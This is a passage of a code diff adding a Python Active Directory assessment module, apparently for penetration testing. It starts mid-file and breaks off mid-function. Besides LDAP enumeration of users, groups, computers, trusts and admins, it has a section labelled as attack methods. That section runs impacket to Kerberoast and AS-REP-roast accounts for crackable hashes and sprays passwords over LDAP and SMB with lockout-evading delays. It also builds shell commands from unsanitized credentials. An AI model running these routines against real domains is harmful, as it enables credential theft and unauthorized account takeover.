+ self.data_dir.mkdir(parents=True, exist_ok=True) + + def print_status(self, message, status='info'): + colors = {'info': Colors.CYAN, 'success': Colors.GREEN, + 'warning': Colors.YELLOW, 'error': Colors.RED} + symbols = {'info': '*', 'success': '+', 'warning': '!', 'error': 'X'} + print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}") + + def _run_cmd(self, cmd, timeout=120): + """Run a shell command and return (success, stdout).""" + try: + result = subprocess.run( + cmd, shell=True, capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + def _save_results(self, name, data): + """Save results to JSON in data/ad_audit/.""" + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + path = self.data_dir / f'{name}_{ts}.json' + with open(path, 'w') as f: + json.dump(data, f, indent=2, default=str) + return str(path) + + # ========== CONNECTION ========== + + def connect(self, dc_host, domain, username=None, password=None, use_ssl=False): + """Establish LDAP connection to a Domain Controller. + + Tries ldap3 first, falls back to impacket if available. + Returns dict with success status and message. + """ + self.dc_host = dc_host + self.domain = domain + self.domain_dn = _get_domain_dn(domain) + self.username = username + self.password = password + self.use_ssl = use_ssl + + port = 636 if use_ssl else 389 + scheme = 'ldaps' if use_ssl else 'ldap' + + if HAS_LDAP3: + try: + use_tls = use_ssl + self.server = Server( + dc_host, port=port, use_ssl=use_tls, + get_info=ALL, connect_timeout=10 + ) + if username and password: + user_dn = f'{domain}\\{username}' + self.conn = Connection( + self.server, user=user_dn, password=password, + authentication=NTLM, auto_bind=True + ) + else: + # Anonymous bind + self.conn = Connection(self.server, auto_bind=True) + + self.connected = True + info_str = '' + if self.server.info: + naming = getattr(self.server.info, 'other', {}) + if hasattr(self.server.info, 'naming_contexts'): + info_str = f' | Naming contexts: {len(self.server.info.naming_contexts)}' + return { + 'success': True, + 'message': f'Connected to {dc_host}:{port} via ldap3{info_str}', + 'backend': 'ldap3' + } + except Exception as e: + self.connected = False + return {'success': False, 'message': f'ldap3 connection failed: {str(e)}'} + + elif HAS_IMPACKET_LDAP: + try: + ldap_url = f'{scheme}://{dc_host}' + self.conn = impacket_ldap.LDAPConnection(ldap_url, self.domain_dn) + if username and password: + self.conn.login(username, password, domain) + self.connected = True + return { + 'success': True, + 'message': f'Connected to {dc_host}:{port} via impacket', + 'backend': 'impacket' + } + except Exception as e: + self.connected = False + return {'success': False, 'message': f'impacket LDAP failed: {str(e)}'} + else: + return { + 'success': False, + 'message': 'No LDAP library available. Install ldap3 (pip install ldap3) or impacket.' + } + + def disconnect(self): + """Close the LDAP connection.""" + if self.conn and HAS_LDAP3: + try: + self.conn.unbind() + except Exception: + pass + self.conn = None + self.server = None + self.connected = False + return {'success': True, 'message': 'Disconnected'} + + def is_connected(self): + """Check if currently connected to a DC.""" + return self.connected and self.conn is not None + + def get_connection_info(self): + """Return current connection details.""" + return { + 'connected': self.is_connected(), + 'dc_host': self.dc_host, + 'domain': self.domain, + 'domain_dn': self.domain_dn, + 'username': self.username, + 'use_ssl': self.use_ssl, + 'backend': 'ldap3' if HAS_LDAP3 else ('impacket' if HAS_IMPACKET_LDAP else None), + 'libs': { + 'ldap3': HAS_LDAP3, + 'impacket_ldap': HAS_IMPACKET_LDAP, + 'impacket_krb': HAS_IMPACKET_KRB, + } + } + + # ========== LDAP SEARCH HELPER ========== + + def _ldap_search(self, search_base=None, search_filter='(objectClass=*)', + attributes=None, size_limit=0): + """Perform LDAP search and return list of entry dicts.""" + if not self.is_connected() or not HAS_LDAP3: + return [] + + if search_base is None: + search_base = self.domain_dn + + if attributes is None: + attributes = ALL_ATTRIBUTES + + try: + self.conn.search( + search_base=search_base, + search_filter=search_filter, + search_scope=SUBTREE, + attributes=attributes, + size_limit=size_limit + ) + entries = [] + for entry in self.conn.entries: + d = {'dn': str(entry.entry_dn)} + for attr in entry.entry_attributes: + val = entry[attr].value + if isinstance(val, list): + d[str(attr)] = [str(v) for v in val] + elif isinstance(val, bytes): + d[str(attr)] = val.hex() + elif isinstance(val, datetime): + d[str(attr)] = val.strftime('%Y-%m-%d %H:%M:%S') + else: + d[str(attr)] = str(val) if val is not None else None + entries.append(d) + return entries + except Exception as e: + self.print_status(f'LDAP search error: {e}', 'error') + return [] + + # ========== ENUMERATION ========== + + def enumerate_users(self, search_filter=None): + """Enumerate all domain user accounts with key attributes.""" + if not self.is_connected(): + return {'error': 'Not connected', 'users': []} + + ldap_filter = search_filter or '(&(objectCategory=person)(objectClass=user))' + attrs = [ + 'sAMAccountName', 'displayName', 'distinguishedName', + 'memberOf', 'lastLogon', 'lastLogonTimestamp', 'pwdLastSet', + 'userAccountControl', 'description', 'mail', + 'adminCount', 'servicePrincipalName', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + users = [] + for entry in raw_entries: + uac = int(entry.get('userAccountControl', 0) or 0) + uac_flags = _parse_uac(uac) + last_logon_raw = entry.get('lastLogon') or entry.get('lastLogonTimestamp') or '0' + user = { + 'username': entry.get('sAMAccountName', ''), + 'display_name': entry.get('displayName', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'mail': entry.get('mail', ''), + 'member_of': entry.get('memberOf', []) if isinstance(entry.get('memberOf'), list) else ([entry.get('memberOf')] if entry.get('memberOf') else []), + 'last_logon': _ad_timestamp_to_str(last_logon_raw), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + 'uac_value': uac, + 'uac_flags': uac_flags, + 'enabled': 'ACCOUNTDISABLE' not in uac_flags, + 'admin_count': entry.get('adminCount', '0') == '1', + 'spn': entry.get('servicePrincipalName', []) if isinstance(entry.get('servicePrincipalName'), list) else ([entry.get('servicePrincipalName')] if entry.get('servicePrincipalName') else []), + 'dont_require_preauth': bool(uac & 0x400000), + 'password_never_expires': bool(uac & 0x10000), + 'when_created': entry.get('whenCreated', ''), + } + users.append(user) + + self.results['users'] = users + self._save_results('users', users) + return {'users': users, 'count': len(users)} + + def enumerate_groups(self, search_filter=None): + """Enumerate all domain groups with their members.""" + if not self.is_connected(): + return {'error': 'Not connected', 'groups': []} + + ldap_filter = search_filter or '(objectCategory=group)' + attrs = [ + 'sAMAccountName', 'distinguishedName', 'description', + 'member', 'groupType', 'adminCount', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + groups = [] + for entry in raw_entries: + members = entry.get('member', []) + if isinstance(members, str): + members = [members] + elif members is None: + members = [] + + group_type = int(entry.get('groupType', 0) or 0) + scope = 'Unknown' + if group_type & 0x00000002: + scope = 'Global' + elif group_type & 0x00000004: + scope = 'Domain Local' + elif group_type & 0x00000008: + scope = 'Universal' + if group_type & 0x80000000: + scope += ' (Security)' + else: + scope += ' (Distribution)' + + groups.append({ + 'name': entry.get('sAMAccountName', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'members': members, + 'member_count': len(members), + 'scope': scope, + 'admin_count': entry.get('adminCount', '0') == '1', + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['groups'] = groups + self._save_results('groups', groups) + return {'groups': groups, 'count': len(groups)} + + def enumerate_computers(self): + """Enumerate domain computers with OS information.""" + if not self.is_connected(): + return {'error': 'Not connected', 'computers': []} + + ldap_filter = '(objectCategory=computer)' + attrs = [ + 'sAMAccountName', 'dNSHostName', 'distinguishedName', + 'operatingSystem', 'operatingSystemVersion', + 'operatingSystemServicePack', 'lastLogonTimestamp', + 'userAccountControl', 'whenCreated', 'description', + 'msDS-AllowedToDelegateTo' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + computers = [] + for entry in raw_entries: + uac = int(entry.get('userAccountControl', 0) or 0) + uac_flags = _parse_uac(uac) + delegate_to = entry.get('msDS-AllowedToDelegateTo', []) + if isinstance(delegate_to, str): + delegate_to = [delegate_to] + elif delegate_to is None: + delegate_to = [] + + computers.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'os_version': entry.get('operatingSystemVersion', ''), + 'os_sp': entry.get('operatingSystemServicePack', ''), + 'last_logon': _ad_timestamp_to_str(entry.get('lastLogonTimestamp', '0')), + 'enabled': 'ACCOUNTDISABLE' not in uac_flags, + 'trusted_for_delegation': bool(uac & 0x80000), + 'constrained_delegation': delegate_to, + 'description': entry.get('description', ''), + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['computers'] = computers + self._save_results('computers', computers) + return {'computers': computers, 'count': len(computers)} + + def enumerate_ous(self): + """Enumerate organizational units.""" + if not self.is_connected(): + return {'error': 'Not connected', 'ous': []} + + ldap_filter = '(objectCategory=organizationalUnit)' + attrs = ['name', 'distinguishedName', 'description', 'whenCreated', 'gPLink'] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + ous = [] + for entry in raw_entries: + gp_link = entry.get('gPLink', '') + linked_gpos = [] + if gp_link: + # Parse gpLink format: [LDAP://cn={GUID},cn=policies,...;0] + import re + linked_gpos = re.findall(r'\[LDAP://([^\]]+)\]', str(gp_link), re.IGNORECASE) + + ous.append({ + 'name': entry.get('name', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'linked_gpos': linked_gpos, + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['ous'] = ous + self._save_results('ous', ous) + return {'ous': ous, 'count': len(ous)} + + def enumerate_gpos(self): + """Enumerate Group Policy Objects.""" + if not self.is_connected(): + return {'error': 'Not connected', 'gpos': []} + + ldap_filter = '(objectCategory=groupPolicyContainer)' + attrs = [ + 'displayName', 'distinguishedName', 'gPCFileSysPath', + 'versionNumber', 'whenCreated', 'whenChanged', 'flags' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + gpos = [] + for entry in raw_entries: + flags = int(entry.get('flags', 0) or 0) + status = 'Enabled' + if flags & 1: + status = 'User config disabled' + if flags & 2: + status = 'Computer config disabled' + if flags == 3: + status = 'All settings disabled' + + gpos.append({ + 'name': entry.get('displayName', ''), + 'dn': entry.get('dn', ''), + 'path': entry.get('gPCFileSysPath', ''), + 'version': entry.get('versionNumber', ''), + 'status': status, + 'when_created': entry.get('whenCreated', ''), + 'when_changed': entry.get('whenChanged', ''), + }) + + self.results['gpos'] = gpos + self._save_results('gpos', gpos) + return {'gpos': gpos, 'count': len(gpos)} + + def enumerate_trusts(self): + """Enumerate domain trusts.""" + if not self.is_connected(): + return {'error': 'Not connected', 'trusts': []} + + ldap_filter = '(objectClass=trustedDomain)' + attrs = [ + 'name', 'distinguishedName', 'trustDirection', + 'trustType', 'trustAttributes', 'flatName', + 'trustPartner', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + trusts = [] + for entry in raw_entries: + direction_val = int(entry.get('trustDirection', 0) or 0) + direction_map = {0: 'Disabled', 1: 'Inbound', 2: 'Outbound', 3: 'Bidirectional'} + direction = direction_map.get(direction_val, f'Unknown ({direction_val})') + + trust_type_val = int(entry.get('trustType', 0) or 0) + type_map = {1: 'Windows NT', 2: 'Active Directory', 3: 'MIT Kerberos', 4: 'DCE'} + trust_type = type_map.get(trust_type_val, f'Unknown ({trust_type_val})') + + attrs_val = int(entry.get('trustAttributes', 0) or 0) + trust_attrs = [] + if attrs_val & 1: + trust_attrs.append('Non-Transitive') + if attrs_val & 2: + trust_attrs.append('Uplevel Only') + if attrs_val & 4: + trust_attrs.append('Quarantined / SID Filtering') + if attrs_val & 8: + trust_attrs.append('Forest Trust') + if attrs_val & 16: + trust_attrs.append('Cross-Organization') + if attrs_val & 32: + trust_attrs.append('Within Forest') + if attrs_val & 64: + trust_attrs.append('Treat As External') + + trusts.append({ + 'name': entry.get('name', ''), + 'partner': entry.get('trustPartner', ''), + 'flat_name': entry.get('flatName', ''), + 'direction': direction, + 'type': trust_type, + 'attributes': trust_attrs, + 'dn': entry.get('dn', ''), + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['trusts'] = trusts + self._save_results('trusts', trusts) + return {'trusts': trusts, 'count': len(trusts)} + + def find_dcs(self): + """Locate domain controllers and FSMO role holders.""" + if not self.is_connected(): + return {'error': 'Not connected', 'dcs': []} + + # Find DCs by userAccountControl SERVER_TRUST_ACCOUNT flag + ldap_filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' + attrs = [ + 'sAMAccountName', 'dNSHostName', 'distinguishedName', + 'operatingSystem', 'operatingSystemVersion', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + dcs = [] + for entry in raw_entries: + dcs.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'os_version': entry.get('operatingSystemVersion', ''), + 'when_created': entry.get('whenCreated', ''), + }) + + # Try to find FSMO role holders from RootDSE + fsmo_roles = {} + if HAS_LDAP3 and self.server and self.server.info: + info = self.server.info + other = getattr(info, 'other', {}) + for role_attr in ['schemaMaster', 'domainNamingMaster', + 'ridMaster', 'pdcEmulator', 'infrastructureMaster']: + if role_attr in other: + fsmo_roles[role_attr] = str(other[role_attr]) + + # Also check via LDAP if server.info didn't have it + if not fsmo_roles: + # Schema Master + schema_entries = self._ldap_search( + search_base=f'CN=Schema,CN=Configuration,{self.domain_dn}', + search_filter='(objectClass=dMD)', + attributes=['fSMORoleOwner'] + ) + if schema_entries: + fsmo_roles['schemaMaster'] = schema_entries[0].get('fSMORoleOwner', '') + + # Domain Naming Master + partitions = self._ldap_search( + search_base=f'CN=Partitions,CN=Configuration,{self.domain_dn}', + search_filter='(objectClass=crossRefContainer)', + attributes=['fSMORoleOwner'] + ) + if partitions: + fsmo_roles['domainNamingMaster'] = partitions[0].get('fSMORoleOwner', '') + + # RID Master, PDC Emulator, Infrastructure Master + domain_entries = self._ldap_search( + search_base=self.domain_dn, + search_filter='(objectClass=domainDNS)', + attributes=['fSMORoleOwner'] + ) + if domain_entries: + fsmo_roles['pdcEmulator'] = domain_entries[0].get('fSMORoleOwner', '') + + result = { + 'dcs': dcs, + 'count': len(dcs), + 'fsmo_roles': fsmo_roles + } + self.results['dcs'] = dcs + self._save_results('dcs', result) + return result + + # ========== ATTACK METHODS ========== + + def find_spn_accounts(self): + """Find user accounts with SPNs set (Kerberoastable).""" + if not self.is_connected(): + return {'error': 'Not connected', 'accounts': []} + + ldap_filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(objectCategory=computer))(!(sAMAccountName=krbtgt)))' + attrs = [ + 'sAMAccountName', 'servicePrincipalName', 'memberOf', + 'pwdLastSet', 'userAccountControl', 'adminCount', + 'distinguishedName', 'description' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + accounts = [] + for entry in raw_entries: + spns = entry.get('servicePrincipalName', []) + if isinstance(spns, str): + spns = [spns] + elif spns is None: + spns = [] + + uac = int(entry.get('userAccountControl', 0) or 0) + accounts.append({ + 'username': entry.get('sAMAccountName', ''), + 'spns': spns, + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + 'admin_count': entry.get('adminCount', '0') == '1', + 'enabled': not bool(uac & 0x0002), + 'member_of': entry.get('memberOf', []) if isinstance(entry.get('memberOf'), list) else ([entry.get('memberOf')] if entry.get('memberOf') else []), + }) + + self.results['spn_accounts'] = accounts + return {'accounts': accounts, 'count': len(accounts)} + + def find_asrep_accounts(self): + """Find accounts that do not require Kerberos pre-authentication.""" + if not self.is_connected(): + return {'error': 'Not connected', 'accounts': []} + + # UF_DONT_REQUIRE_PREAUTH = 0x400000 + ldap_filter = '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' + attrs = [ + 'sAMAccountName', 'distinguishedName', 'memberOf', + 'pwdLastSet', 'userAccountControl', 'description' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + accounts = [] + for entry in raw_entries: + accounts.append({ + 'username': entry.get('sAMAccountName', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + 'member_of': entry.get('memberOf', []) if isinstance(entry.get('memberOf'), list) else ([entry.get('memberOf')] if entry.get('memberOf') else []), + }) + + self.results['asrep_accounts'] = accounts + return {'accounts': accounts, 'count': len(accounts)} + + def kerberoast(self, dc_host, domain, username, password): + """Request TGS tickets for SPN accounts and extract hashes. + + Uses impacket's GetUserSPNs.py via subprocess, falling back to + manual TGS-REQ if impacket scripts are not available on PATH. + Returns hashes in hashcat ($krb5tgs$23$*) format. + """ + hashes = [] + + # Try GetUserSPNs.py from impacket + cmd = ( + f'GetUserSPNs.py {domain}/{username}:{password} ' + f'-dc-ip {dc_host} -request -outputfile -' + ) + success, output = self._run_cmd(cmd, timeout=60) + if success and output: + for line in output.splitlines(): + line = line.strip() + if line.startswith('$krb5tgs$'): + hashes.append(line) + + # Also try python -m form + if not hashes: + cmd2 = ( + f'python -m impacket.examples.GetUserSPNs ' + f'{domain}/{username}:{password} ' + f'-dc-ip {dc_host} -request -outputfile -' + ) + success2, output2 = self._run_cmd(cmd2, timeout=60) + if success2 and output2: + for line in output2.splitlines(): + line = line.strip() + if line.startswith('$krb5tgs$'): + hashes.append(line) + + # Also try impacket-GetUserSPNs (newer naming) + if not hashes: + cmd3 = ( + f'impacket-GetUserSPNs {domain}/{username}:{password} ' + f'-dc-ip {dc_host} -request' + ) + success3, output3 = self._run_cmd(cmd3, timeout=60) + if success3 and output3: + for line in output3.splitlines(): + line = line.strip() + if line.startswith('$krb5tgs$'): + hashes.append(line) + + if not hashes: + # Fallback: enumerate SPNs and note that impacket is needed + spn_result = self.find_spn_accounts() + spn_count = spn_result.get('count', 0) + if spn_count > 0: + return { + 'hashes': [], + 'count': 0, + 'spn_accounts': spn_count, + 'message': ( + f'Found {spn_count} SPN accounts but could not extract TGS hashes. ' + 'Install impacket: pip install impacket' + ) + } + return { + 'hashes': [], + 'count': 0, + 'spn_accounts': 0, + 'message': 'No SPN accounts found or impacket not available' + } + + self.results['kerberoast_hashes'] = hashes + self._save_results('kerberoast_hashes', hashes) + return { + 'hashes': hashes, + 'count': len(hashes), + 'spn_accounts': len(hashes), + 'message': f'Extracted {len(hashes)} TGS hash(es) in hashcat format' + } + + def asrep_roast(self, dc_host, domain, userlist=None): + """Find accounts without pre-auth and extract AS-REP hashes. + + Uses impacket's GetNPUsers.py via subprocess. + """ + hashes = [] + + if userlist: + # Write userlist to temp file + tmp_file = self.data_dir / 'asrep_users.txt' + with open(tmp_file, 'w') as f: + for u in userlist: + f.write(u.strip() + '\n') + user_arg = f'-usersfile {tmp_file}' + else: + user_arg = '' + + # Try GetNPUsers.py + for cmd_prefix in [ + 'GetNPUsers.py', + 'python -m impacket.examples.GetNPUsers', + 'impacket-GetNPUsers' + ]: + cmd = f'{cmd_prefix} {domain}/ -dc-ip {dc_host} {user_arg} -format hashcat -outputfile -' + success, output = self._run_cmd(cmd, timeout=60) + if success and output: + for line in output.splitlines(): + line = line.strip() + if line.startswith('$krb5asrep$'): + hashes.append(line) + if hashes: + break + + if not hashes: + # Enumerate AS-REP vulnerable accounts via LDAP + asrep_result = self.find_asrep_accounts() + vuln_count = asrep_result.get('count', 0) + return { + 'hashes': [], + 'count': 0, + 'vulnerable_accounts': vuln_count, + 'accounts': asrep_result.get('accounts', []), + 'message': ( + f'Found {vuln_count} accounts without pre-auth but ' + 'could not extract AS-REP hashes. Install impacket.' + ) if vuln_count > 0 else 'No accounts without pre-authentication found' + } + + self.results['asrep_hashes'] = hashes + self._save_results('asrep_hashes', hashes) + return { + 'hashes': hashes, + 'count': len(hashes), + 'vulnerable_accounts': len(hashes), + 'message': f'Extracted {len(hashes)} AS-REP hash(es) in hashcat format' + } + + def password_spray(self, userlist, password, dc_host, domain, protocol='ldap'): + """Spray a single password against a list of users. + + Implements delay and jitter between attempts to avoid account lockout. + Supports LDAP and SMB protocols. + """ + if not userlist or not password: + return {'error': 'User list and password required', 'results': []} + + results = [] + successes = [] + failures = [] + lockouts = [] + delay_base = 1.0 + jitter = 0.5 + + for i, user in enumerate(userlist): + user = user.strip() + if not user: + continue + + entry = {'username': user, 'status': 'unknown', 'message': ''} + + if protocol == 'ldap': + try: + port = 636 if self.use_ssl else 389 + test_server = Server(dc_host, port=port, use_ssl=self.use_ssl, + connect_timeout=5) if HAS_LDAP3 else None + if test_server: + test_conn = Connection( + test_server, + user=f'{domain}\\{user}', + password=password, + authentication=NTLM, + auto_bind=True + ) + test_conn.unbind() + entry['status'] = 'success' + entry['message'] = 'Authentication successful' + successes.append(user) + else: + entry['status'] = 'error' + entry['message'] = 'ldap3 not available' + except Exception as e: + err_msg = str(e).lower() + if 'locked' in err_msg or '775' in err_msg: + entry['status'] = 'lockout' + entry['message'] = 'Account locked out' + lockouts.append(user) + elif 'credential' in err_msg or 'invalid' in err_msg or '52e' in err_msg: + entry['status'] = 'failed' + entry['message'] = 'Invalid credentials' + failures.append(user) + elif 'disabled' in err_msg or '533' in err_msg: + entry['status'] = 'disabled' + entry['message'] = 'Account disabled' + failures.append(user) + elif 'expired' in err_msg or '532' in err_msg: + entry['status'] = 'expired' + entry['message'] = 'Password expired' + failures.append(user) + else: + entry['status'] = 'failed' + entry['message'] = str(e)[:100] + failures.append(user) + + elif protocol == 'smb': + # Use smbclient or impacket's smbconnection + cmd = f'smbclient -L //{dc_host} -U {domain}\\\\{user}%{password} -c quit 2>&1' + success, output = self._run_cmd(cmd, timeout=10) + if success or 'Sharename' in output: + entry['status'] = 'success' + entry['message'] = 'SMB authentication successful' + successes.append(user) + elif 'LOCKED' in output.upper() or 'locked' in output.lower(): + entry['status'] = 'lockout' + entry['message'] = 'Account locked out' + lockouts.append(user) + else: + entry['status'] = 'failed' + entry['message'] = 'Authentication failed' + failures.append(user) + + results.append(entry) + + # Delay between attempts with jitter + if i < len(userlist) - 1: + wait = delay_base + random.uniform(0, jitter) + time.sleep(wait) + + # Stop if too many lockouts + if len(lockouts) >= 3: + remaining = [u.strip() for u in userlist[i+1:] if u.strip()] + for u in remaining: + results.append({ + 'username': u, + 'status': 'skipped', + 'message': 'Skipped — too many lockouts detected' + }) + break + + spray_result = { + 'results': results, + 'total': len(results), + 'successes': successes, + 'success_count': len(successes), + 'failure_count': len(failures), + 'lockout_count': len(lockouts), + 'password_tested': password, + 'protocol': protocol, + } + self.results['spray_results'] = spray_result + self._save_results('password_spray', spray_result) + return spray_result + + def analyze_acls(self, target_dn=None): + """Find dangerous ACL entries: GenericAll, WriteDACL, WriteOwner, etc.""" + if not self.is_connected(): + return {'error': 'Not connected', 'findings': []} + + search_base = target_dn or self.domain_dn + # Search for objects with ntSecurityDescriptor + ldap_filter = '(objectClass=*)' + attrs = ['distinguishedName', 'nTSecurityDescriptor', 'objectClass', 'sAMAccountName'] + + # We need to request the SD control for ntSecurityDescriptor + findings = [] + + # Search high-value targets: users, groups, OUs, domain root + targets = [ + ('(&(objectCategory=group)(adminCount=1))', 'Admin Group'), + ('(&(objectCategory=person)(adminCount=1))', 'Admin User'), + ('(objectCategory=organizationalUnit)', 'OU'), + ('(objectCategory=domainDNS)', 'Domain'), + ] + + for ldap_filter, obj_type in targets: + entries = self._ldap_search( + search_base=search_base, + search_filter=ldap_filter, + attributes=['distinguishedName', 'sAMAccountName', 'nTSecurityDescriptor'] + ) + + for entry in entries: + sd_raw = entry.get('nTSecurityDescriptor') + obj_name = entry.get('sAMAccountName', entry.get('dn', '')) + + # If we got the SD, try to parse DACL + if sd_raw: + # Binary SD parsing is complex; flag it for manual review + findings.append({ + 'target': obj_name, + 'target_dn': entry.get('dn', ''), + 'object_type': obj_type, + 'has_sd': True, + 'risk': 'Medium', + 'permission': 'Security Descriptor present — manual ACL review recommended', + 'principal': 'N/A', + }) + else: + # Without SD, check for common misconfigurations via group membership + findings.append({ + 'target': obj_name, + 'target_dn': entry.get('dn', ''), + 'object_type': obj_type, + 'has_sd': False, + 'risk': 'Low', + 'permission': 'Could not read security descriptor (insufficient privileges)', + 'principal': 'N/A', + }) + + # Check for users who can DCSync (Replicating Directory Changes) + repl_filter = '(&(objectCategory=person)(objectClass=user)(adminCount=1))' + admin_entries = self._ldap_search( + search_filter=repl_filter, + attributes=['sAMAccountName', 'distinguishedName', 'memberOf'] + ) + for entry in admin_entries: + member_of = entry.get('memberOf', []) + if isinstance(member_of, str): + member_of = [member_of] + for group in member_of: + group_lower = group.lower() + if 'domain admins' in group_lower or 'enterprise admins' in group_lower: + findings.append({ + 'target': self.domain, + 'target_dn': self.domain_dn, + 'object_type': 'Domain', + 'principal': entry.get('sAMAccountName', ''), + 'permission': 'DCSync capable (Domain/Enterprise Admin)', + 'risk': 'Critical', + 'has_sd': True, + }) + break + + self.results['acl_findings'] = findings + self._save_results('acl_findings', findings) + return {'findings': findings, 'count': len(findings)} + + def find_admin_accounts(self): + """Enumerate Domain Admins, Enterprise Admins, Schema Admins, Account Operators.""" + if not self.is_connected(): + return {'error': 'Not connected', 'admins': []} + + admin_groups = [ + ('Domain Admins', f'CN=Domain Admins,CN=Users,{self.domain_dn}'), + ('Enterprise Admins', f'CN=Enterprise Admins,CN=Users,{self.domain_dn}'), + ('Schema Admins', f'CN=Schema Admins,CN=Users,{self.domain_dn}'), + ('Account Operators', f'CN=Account Operators,CN=Builtin,{self.domain_dn}'), + ('Administrators', f'CN=Administrators,CN=Builtin,{self.domain_dn}'), + ('Server Operators', f'CN=Server Operators,CN=Builtin,{self.domain_dn}'), + ('Backup Operators', f'CN=Backup Operators,CN=Builtin,{self.domain_dn}'), + ] + + all_admins = [] + for group_name, group_dn in admin_groups: + ldap_filter = f'(&(objectCategory=person)(objectClass=user)(memberOf={group_dn}))' + entries = self._ldap_search( + search_filter=ldap_filter, + attributes=['sAMAccountName', 'displayName', 'userAccountControl', + 'lastLogon', 'pwdLastSet', 'adminCount'] + ) + members = [] + for entry in entries: + uac = int(entry.get('userAccountControl', 0) or 0) + members.append({ + 'username': entry.get('sAMAccountName', ''), + 'display_name': entry.get('displayName', ''), + 'enabled': not bool(uac & 0x0002), + 'last_logon': _ad_timestamp_to_str(entry.get('lastLogon', '0')), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + }) + + all_admins.append({ + 'group': group_name, + 'group_dn': group_dn, + 'members': members, + 'count': len(members), + }) + + self.results['admin_accounts'] = all_admins + self._save_results('admin_accounts', all_admins) + return {'admins': all_admins, 'total_groups': len(all_admins)} + + def find_unconstrained_delegation(self): + """Find servers with unconstrained delegation (TRUSTED_FOR_DELEGATION).""" + if not self.is_connected(): + return {'error': 'Not connected', 'servers': []} + + # 0x80000 = TRUSTED_FOR_DELEGATION, exclude DCs (0x2000) + ldap_filter = ( + '(&(objectCategory=computer)' + '(userAccountControl:1.2.840.113556.1.4.803:=524288)' + '(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))' + ) + attrs = ['sAMAccountName', 'dNSHostName', 'distinguishedName', + 'operatingSystem', 'description'] + + entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + servers = [] + for entry in entries: + servers.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'description': entry.get('description', ''), + 'risk': 'High', + }) + + self.results['unconstrained_delegation'] = servers + return {'servers': servers, 'count': len(servers)} + + def find_constrained_delegation(self): + """Find constrained delegation configurations.""" + if not self.is_connected(): + return {'error': 'Not connected', 'servers': []} + + ldap_filter = '(msDS-AllowedToDelegateTo=*)' + attrs = ['sAMAccountName', 'dNSHostName', 'distinguishedName', + 'msDS-AllowedToDelegateTo', 'objectCategory', 'operatingSystem', + 'userAccountControl'] + + entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + servers = [] + for entry in entries: + delegate_to = entry.get('msDS-AllowedToDelegateTo', []) + if isinstance(delegate_to, str): + delegate_to = [delegate_to] + elif delegate_to is None: + delegate_to = [] + + uac = int(entry.get('userAccountControl', 0) or 0) + protocol_transition = bool(uac & 0x1000000) + + servers.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'allowed_to_delegate_to': delegate_to, + 'protocol_transition': protocol_transition, + 'risk': 'High' if protocol_transition else 'Medium', + }) + + self.results['constrained_delegation'] = servers + return {'servers': servers, 'count': len(servers)} + + # ========== BLOODHOUND ========== + + def bloodhound_collect(self, dc_host, domain, username, password): + """Run BloodHound data collection. + + Tries bloodhound-python (SharpHound equivalent) via subprocess, + falls back to manual LDAP-based collection. + """ + output_dir = self.data_dir / 'bloodhound' + output_dir.mkdir(parents=True, exist_ok=True) + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + + collection_stats = { + 'users': 0, 'groups': 0, 'computers': 0, + 'sessions': 0, 'domains': 0, + 'files': [], 'method': '', 'timestamp': ts, + } + + # Try bloodhound-python + for cmd_prefix in ['bloodhound-python', 'python -m bloodhound']: + cmd = ( + f'{cmd_prefix} -u {username} -p {password} ' + f'-d {domain} -dc {dc_host} -c All ' + f'--zip -o {output_dir}' + ) + success, output = self._run_cmd(cmd, timeout=300) + if success: + collection_stats['method'] = 'bloodhound-python' + # Count output files + for f in 